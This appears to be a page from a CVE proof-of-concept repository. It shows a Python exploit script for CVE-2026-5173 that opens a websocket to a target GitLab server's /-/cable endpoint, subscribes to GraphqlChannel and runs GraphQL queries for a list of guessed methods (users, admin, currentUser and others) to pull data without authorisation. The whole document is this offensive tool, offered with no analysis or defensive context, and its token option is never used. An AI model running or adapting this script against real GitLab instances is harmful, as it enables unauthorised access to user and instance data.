5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-5173.py PY
#!/usr/bin/env python3
import asyncio
import json
import sys
import argparse
import websockets

async def run_poc(target, token=None):
    print(f"[+] CVE-2026-5173 PoC v2 - Target: {target}")
    
    if not target.startswith(("http://", "https://")):
        target = "http://" + target
    
    ws_url = target.replace("http://", "ws://").replace("https://", "wss://") + "/-/cable"
    
    headers = {"Origin": target}
    
    try:
        async with websockets.connect(ws_url, extra_headers=headers) as ws:
            print("[+] WebSocket connected")
            
            # Subscribe to GraphqlChannel (primary vulnerable channel)
            await ws.send(json.dumps({
                "command": "subscribe",
                "identifier": json.dumps({"channel": "GraphqlChannel"})
            }))
            print("[+] Subscribed to GraphqlChannel")
            
            # Wait for subscription confirmation
            await asyncio.sleep(1)
            
            # List of likely unintended methods (based on GitLab internals + CVE description)
            test_methods = [
                "currentUser", "viewer", "project", "projects", "users", "namespaces",
                "instanceStatistics", "admin", "getInternalData", "export", "query",
                "execute", "mutation", "gitlabInternal", "featureFlags"
            ]
            
            for method in test_methods:
                print(f"[*] Testing method: {method}")
                
                query = f'query {{ {method} {{ id name email }} }}' if method in ["currentUser", "viewer"] else \
                        f'query {{ {method} {{ nodes {{ id name }} }} }}'
                
                payload = {
                    "command": "message",
                    "identifier": json.dumps({"channel": "GraphqlChannel"}),
                    "data": json.dumps({
                        "action": "execute",
                        "query": query,
                        "variables": {}
                    })
                }
                
                await ws.send(json.dumps(payload))
                
                try:
                    response = await asyncio.wait_for(ws.recv(), timeout=5)
                    if "data" in response or "result" in response:
                        print(f"[SUCCESS] Possible unauthorized access via '{method}'!")
                        print(f"    → Response: {response[:300]}...\n")
                    else:
                        print(f"    Response received (check manually)\n")
                except asyncio.TimeoutError:
                    print(f"    No response (timeout)\n")
                    
    except Exception as e:
        print(f"[-] Connection error: {e}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2026-5173 GitLab WebSocket PoC v2")
    parser.add_argument("target", help="Target URL e.g. http://192.168.1.100:8080")
    parser.add_argument("-t", "--token", help="GitLab Personal Access Token (optional)")
    args = parser.parse_args()
    
    asyncio.run(run_poc(args.target, args.token))

if __name__ == "__main__":
    main()